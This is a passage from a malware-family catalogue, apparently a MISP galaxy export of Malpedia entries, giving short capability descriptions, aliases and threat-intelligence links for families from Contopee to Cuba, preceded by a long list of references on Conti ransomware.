https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd

https://www.youtube.com/watch?v=uORuVVQzZ0A

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups

https://www.ironnet.com/blog/ransomware-graphic-blog

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti

https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html

https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://github.com/whichbuffer/Conti-Ransomware-IOC

https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html

https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf

https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/

https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware

https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/

https://arcticwolf.com/resources/blog/karakurt-web

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html

https://github.com/TheParmak/conti-leaks-englished

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware

https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/

https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/

https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider

https://twitter.com/AltShiftPrtScn/status/1350755169965924352

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf

https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html

https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/

https://www.threatstop.com/blog/conti-ransomware-source-code-leaked

https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/

https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://github.com/EmissarySpider/ransomware-descendants

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html

https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html

https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html

https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1

https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2

https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/

https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/

https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf

https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://redcanary.com/blog/intelligence-insights-november-2021/

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.ic3.gov/Media/News/2021/210521.pdf

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one

https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/

https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/

https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/

https://share.vx-underground.org/Conti/

https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/

https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding

https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/

https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir

https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html

https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/

https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf

https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia

https://www.youtube.com/watch?v=cYx7sQRbjGA

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti

https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://securelist.com/luna-black-basta-ransomware/106950

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://intel471.com/blog/shipping-companies-ransomware-credentials

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/

https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf

https://twitter.com/AltShiftPrtScn/status/1423188974298861571

Contopee

FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.

The tag is: misp-galaxy:malpedia="Contopee"

Contopee is also known as:

  • WHITEOUT

Table 3205. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee

https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks

https://content.fireeye.com/apt/rpt-apt38

https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks

CopperStealer

According to PCrisk, CopperStealer, also known as Mingloa, is a malicious program designed to steal sensitive/personal information. It also has the capability to cause chain infections (i.e., to download and install additional malware).

Significant activity of CopperStealer has been observed in Brazil, India, Indonesia, Pakistan, and the Philippines. At the time of research, this malware had been noted being spread via websites offering illegal activation tools ("cracks") for licensed software products.

The tag is: misp-galaxy:malpedia="CopperStealer"

CopperStealer is also known as:

  • Mingloa

Table 3207. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer

https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft

https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html

CoronaVirus Ransomware

The tag is: misp-galaxy:malpedia="CoronaVirus Ransomware"

CoronaVirus Ransomware is also known as:

  • CoronaVirus Cover-Ransomware

Table 3211. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware

https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html

Cova

The tag is: misp-galaxy:malpedia="Cova"

Cova is also known as:

Table 3214. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cova

https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer

Covicli

Covicli is a modified SSLeay32 dynamic library used as a backdoor. The library lets the attacker communicate with the C2 over an OpenSSL-provided encrypted channel.

The tag is: misp-galaxy:malpedia="Covicli"

Covicli is also known as:

  • Covically

Table 3215. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli

https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf

Covid22

Destructive "joke" malware that ultimately deploys a wiper for the MBR.

The tag is: misp-galaxy:malpedia="Covid22"

Covid22 is also known as:

Table 3216. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22

https://www.fortinet.com/blog/threat-research/to-joke-or-not-to-joke-covid-22-brings-disaster-to-mbr

CoViper

PCRisk notes that CoViper is yet another Coronavirus/COVID-19-themed malware infection, most likely proliferated as a file related to the pandemic. It operates by rewriting the system Master Boot Record (MBR). It does not delete the original, but rather creates a backup and replaces it with a custom MBR.

Typically, malicious software that modifies the MBR does so to prevent the Operating System (OS) from being booted (i.e., started). It also displays a screen-encompassing message, often containing a ransom demand, which denies the user access to the device.

The tag is: misp-galaxy:malpedia="CoViper"

CoViper is also known as:

Table 3217. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper

https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/

https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html

COZYDUKE

CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around a core backdoor component. This component can be instructed by the C&C server to download and execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array of functionality. Known CozyDuke modules include:

  • Command execution module for executing arbitrary Windows Command Prompt commands

  • Password stealer module

  • NT LAN Manager (NTLM) hash stealer module

  • System information gathering module

  • Screenshot module

The tag is: misp-galaxy:malpedia="COZYDUKE"

COZYDUKE is also known as:

  • Cozer

  • CozyBear

  • CozyCar

  • EuroAPT

Table 3218. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf

crackshot

CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.

The tag is: misp-galaxy:malpedia="crackshot"

crackshot is also known as:

Table 3219. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crackshot

https://content.fireeye.com/apt-41/rpt-apt41/

CradleCore

The tag is: misp-galaxy:malpedia="CradleCore"

CradleCore is also known as:

Table 3220. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore

CRAT

According to Cisco Talos, CRAT is a remote access trojan with plugin capabilities, used by Lazarus since at least May 2020.

The tag is: misp-galaxy:malpedia="CRAT"

CRAT is also known as:

Table 3221. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crat

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.secrss.com/articles/18635

https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg

https://suspected.tistory.com/269

https://blog.talosintelligence.com/2020/11/crat-and-plugins.html

CREAMSICLE

The tag is: misp-galaxy:malpedia="CREAMSICLE"

CREAMSICLE is also known as:

Table 3222. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Credraptor

The tag is: misp-galaxy:malpedia="Credraptor"

Credraptor is also known as:

Table 3224. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor

http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

CreepySnail

The tag is: misp-galaxy:malpedia="CreepySnail"

CreepySnail is also known as:

Table 3225. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.creepysnail

https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/

CreepExfil

The tag is: misp-galaxy:malpedia="CreepExfil"

CreepExfil is also known as:

Table 3226. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.creep_exfil

https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/

Crenufs

The tag is: misp-galaxy:malpedia="Crenufs"

Crenufs is also known as:

Table 3227. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs

Crimson RAT

Crimson RAT was first discovered in 2017 and has since been used to attack organizations around the world. The malware is often distributed through phishing emails or by exploiting vulnerabilities in outdated security software. Once Crimson RAT is installed on a computer, it can be used to steal data, spy on users, and even take control of the infected computer.

Some of the features of Crimson RAT include:

  • Remote control of infected computers

  • Data theft, such as passwords, files, and emails

  • User spying

  • Takeover of infected computers

  • Locking of infected computers

  • Extortion of payments

The tag is: misp-galaxy:malpedia="Crimson RAT"

Crimson RAT is also known as:

  • SEEDOOR

  • Scarimson

Table 3228. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson

https://twitter.com/katechondic/status/1502206599166939137

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://www.secrss.com/articles/24995

https://s.tencent.com/research/report/669.html

https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ

https://twitter.com/teamcymru_S2/status/1501955802025836546

https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://securelist.com/transparent-tribe-part-1/98127/

https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1

https://securelist.com/transparent-tribe-part-2/98233/

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

https://blog.yoroi.company/research/transparent-tribe-four-years-later

https://twitter.com/teamcymru/status/1351228309632385027

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf

https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg

https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/

https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/

https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg

https://www.seqrite.com/blog/transparent-tribe-apt-actively-lures-indian-army-amidst-increased-targeting-of-educational-institutions

https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/

https://www.4hou.com/posts/vLzM

https://securelist.com/apt-trends-report-q3-2020/99204/

https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/

CrimsonIAS

According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable in that it only listens for incoming connections, which sets it apart from typical Windows backdoors that beacon out.

The tag is: misp-galaxy:malpedia="CrimsonIAS"

CrimsonIAS is also known as:

Table 3229. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias

https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/

CrossLock

The tag is: misp-galaxy:malpedia="CrossLock"

CrossLock is also known as:

Table 3231. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crosslock

https://twitter.com/1ZRR4H/status/1648232869809078273

CROSSWALK

According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.

The tag is: misp-galaxy:malpedia="CROSSWALK"

CROSSWALK is also known as:

  • Motnug

  • ProxIP

  • TOMMYGUN

Table 3232. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk

https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://thehackernews.com/2021/01/researchers-disclose-undocumented.html

https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/

https://www.youtube.com/watch?v=FttiysUZmDw

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://www.youtube.com/watch?v=8x-pGlWpIYI

https://content.fireeye.com/apt-41/rpt-apt41/

https://twitter.com/MrDanPerez/status/1159459082534825986

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

Croxloader

According to Trend Micro, this is a custom loader for win.cobalt_strike, used by Earth Longzhi (a subgroup of APT41).

The tag is: misp-galaxy:malpedia="Croxloader"

Croxloader is also known as:

Table 3233. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader

https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html

CruLoader

The tag is: misp-galaxy:malpedia="CruLoader"

CruLoader is also known as:

Table 3234. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader

https://malwarebookreports.com/cruloader-zero2auto/

CryLocker

The tag is: misp-galaxy:malpedia="CryLocker"

CryLocker is also known as:

Table 3237. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker

Crypt0l0cker

The tag is: misp-galaxy:malpedia="Crypt0l0cker"

Crypt0l0cker is also known as:

Table 3239. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker

http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html

CryptBot

A typical infostealer, capable of obtaining browser credentials, cryptocurrency wallets, browser cookies, and credit card data, and of taking screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.

The tag is: misp-galaxy:malpedia="CryptBot"

CryptBot is also known as:

Table 3240. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/

https://asec.ahnlab.com/en/35981/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://asec.ahnlab.com/en/31683/

https://experience.mandiant.com/trending-evil-2/p/1

https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/

https://www.mandiant.com/resources/russian-targeting-gov-business

https://asec.ahnlab.com/en/31802/

https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html

https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger

https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/

https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/

https://asec.ahnlab.com/en/26052/

https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer

https://asec.ahnlab.com/en/24423/

https://fr3d.hk/blog/cryptbot-too-good-to-be-true

https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf

https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf

CrypticConvo

CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to Palo Alto Networks, CrypticConvo and several additional trojans are believed to be included in a meta framework used by the "Scarlet Mimic" threat actor in order to quickly evade AV systems.

The tag is: misp-galaxy:malpedia="CrypticConvo"

CrypticConvo is also known as:

Table 3241. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo

https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/

CryptNET

According to OALabs, this ransomware has the following features:

  • Files are encrypted with AES CBC using a generated 256 bit key and IV.

  • The generated AES keys are encrypted using a hard coded RSA key and appended to the encrypted files.

The tag is: misp-galaxy:malpedia="CryptNET"

CryptNET is also known as:

Table 3242. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptnet

https://research.openanalysis.net/dotnet/cryptnet/ransomware/2023/04/20/cryptnet.html

CryptoClippy

The tag is: misp-galaxy:malpedia="CryptoClippy"

CryptoClippy is also known as:

Table 3243. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoclippy

https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/

CryptoDarkRubix

The tag is: misp-galaxy:malpedia="CryptoDarkRubix"

CryptoDarkRubix is also known as:

  • Ranet

Table 3244. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix

https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html

CryptoJoker

CryptoJoker is an open source ransomware written in C#. CryptoJoker uses a combination of a "custom XOR" encryption and RSA. A public/private key pair is generated for every computer.

The tag is: misp-galaxy:malpedia="CryptoJoker"

CryptoJoker is also known as:

  • PlutoCrypt

Table 3245. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptojoker

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/plutocrypt-a-cryptojoker-ransomware-variant

CryptoPatronum

CryptoPatronum is a ransomware that encrypts user data with AES-256 (CBC) and demands BTC / ETH in exchange for the original files. The ransom note has no title, only a reference to crsss.exe, the malware's original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension.

The tag is: misp-galaxy:malpedia="CryptoPatronum"

CryptoPatronum is also known as:

Table 3249. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptopatronum

https://id-ransomware.blogspot.com/2020/01/cryptopatronum-ransomware.html

Cryptorium

The tag is: misp-galaxy:malpedia="Cryptorium"

Cryptorium is also known as:

Table 3250. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium

https://twitter.com/struppigel/status/810770490491043840

Cryptowall

CryptoWall is ransomware that is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware, and uses a Trojan horse to deliver the malicious payload.

The tag is: misp-galaxy:malpedia="Cryptowall"

Cryptowall is also known as:

Table 3253. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://sites.temple.edu/care/ci-rw-attacks/

https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f

CryptoRansomeware

The tag is: misp-galaxy:malpedia="CryptoRansomeware"

CryptoRansomeware is also known as:

Table 3256. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware

https://twitter.com/JaromirHorejsi/status/818369717371027456

csharp-streamer RAT

The tag is: misp-galaxy:malpedia="csharp-streamer RAT"

csharp-streamer RAT is also known as:

Table 3260. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.csharpstreamer

https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/

Cuba

Ransomware.

The tag is: misp-galaxy:malpedia="Cuba"

Cuba is also known as:

  • COLDDRAW

Table 3262. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba

https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/

https://www.mandiant.com/resources/unc2596-cuba-ransomware

https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/

https://blog.group-ib.com/hancitor-cuba-ransomware

https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more

https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware

https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-on+a+roll.pdf

